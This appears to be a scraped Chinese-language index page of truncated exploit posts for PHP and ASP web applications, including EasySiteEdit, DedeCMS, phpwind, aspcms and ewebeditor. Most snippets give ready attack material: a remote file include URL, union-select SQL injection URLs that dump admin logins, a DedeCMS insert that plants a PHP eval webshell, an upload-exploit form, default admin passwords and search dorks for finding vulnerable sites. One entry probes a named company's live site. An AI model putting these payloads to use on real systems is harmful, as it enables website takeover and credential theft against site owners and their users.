Exploit Title: EasySiteEdit remote file include 作者:koskesh jakesh 下载地址: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip # Tested on: linux ——————————- vul:sublink.php line 20: include($_REQUEST['langval']); ——————————- 测试: www.badguest.cn /path/sublink.php?langval=shell.txt? 修复：过滤 ——————&#...

10天前 爆的 dede 0day   相信很多人都不会利用 然后这个漏洞已经被大牛们 玩稀了 昨天  8月21日 我测试的时候 发现还是有好多站点存在 现在我把详细的利用办法  给大家 首先     我们 本地搭建一个phpstudy 下载织梦5.6GBK程序   一步一步安装 由于我的本机环境已经删除了 我就不发图片了       安装到  输入  数据库名称      用户名 还有密码的时候 我们在数据库里写root 接着我们登陆phpmyadmin 进去   选择   root 然后 sql  插入  insert into dede_mytag(aid,normbody) values(1,’{dede:php}$fp = @f...

inurl:products.asp?c_id= 大部分英文En/Index.asp 部分存在注入漏洞 不行的话可以中转注入 默认表段manager www.badguest.cn默认子段managerName managerPassword 默认账号密码htadmin  sfoht0574 后台拿webshell方法在网站配置那里写上scriptkiddies.asp 然后上图片马 就可以拿webshell了 编辑器也存在默认账号密码 账号：soonet 密码：soonet518 后台：lavery_Edit/admin_login.asp 编辑器拿webshell不多说你懂的. 修复：常见问题，参见前文

phpwind 7.5 Multiple Include Vulnerabilities 壹.api/class_base.php本地包含漏洞 1.描敘 api/class_base.php文件裏callback函數裏$mode變量沒有過濾導致任意包含本地文件,從而可以執行任意PHP命令. 2. 具體分析 api/class_base.php文件裏: function callback($mode, $method, $params) { if (!isset($this->classdb[$mode])) { if (!file_exists(R_P.’api/class_’ . $mode . ‘.php’)) { return new ErrorMsg(API_MODE_NOT_EXISTS, “Class($mode) Not Exists”); } require_once(R_P.’api/class_’ . $mode . ‘...

细说明：注册页面进行用户名检验的页面，没有对输入进行过滤 漏洞证明：http://rma.h3c.com/spms_outter/base/CheckRegistedOrg.do?orgname=admin 返回 “帐号：admin 已被注册，请换一个用户名注册！”   http://rma.h3c.com/spms_outter/base/CheckRegistedOrg.do?orgname=admin’%20and%20′a’='b 返回 “没有人注册 admin’ and ‘a’='b 这个帐号，您可以使用这个帐号注册。”   http://rma.h3c.com/spms_outter/base/CheckRegistedOrg.do?orgname=admin’%20or%20′a&...

 aspcms开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。       漏洞出现在   /plug/productbuy.asp   对接收的参数id没有进行过滤而导致的注入漏洞   注入后的页面有跳转，所以要快，建议用快捷键复制   爆用户名 /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1   这是爆ID=1的账...

网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell www.t00ls.net5 G$ w& h” m! n9 S: G 前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,’{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \’<?php eval($_POST[c]) ?>\’);echo “OK”;@fclose($fp);{/dede:php}’); 再用下面表单提交，shell 就在同目录下  1.php。原理自己研究。。。 ) O+ I’ L2 I% Y) E: ...

“智有道”专业旅游网站系统是智有道团队专业开发，针对目前的旅游平台进行强大的功能开发！ 后台管理 默认后台路径：/admin/login.asp 默认管理员：user:admin 默认密码：psw:123456 下载地址:http://down.chinaz.com/soft/30295.htm Demo Url:http://will2011.w701.hzdemo.cn/ SQL EXP Tset: http://will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin 遍历目录： /admin/do/admin_uploadfile.asp?id=1&dir=../.. http://will2011.w701...

PHP版本的ewebeditor用的比ASP版本的少的多吧，俺是非常少碰到。貌似 听说国外用的非常多。台湾人喜欢用？用的着的关注一下吧。 EXP如下： <form action=”" method=post enctype=”multipart/form-data”>  <INPUT TYPE=”hidden” name=”MAX_FILE_SIZE” value=”512000″>  URL:<input type=text name=url value=”http://www.xxx.com/ewebeditor/” size=100><br>  <INPUT TYPE=”hidden” name=”aStyle[12]” value=”toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gi...

“js/calendar.php”： $lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤，很明显的包含漏洞 if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘zh_cn’; } require(dirname(dirname(__FILE__)) . ‘/data/config.php’); header(‘Content-type: application/x-javascript; charset=’ . EC_CHARSET); include_once(‘../languages/’ . $lang . ‘/calendar.php’)...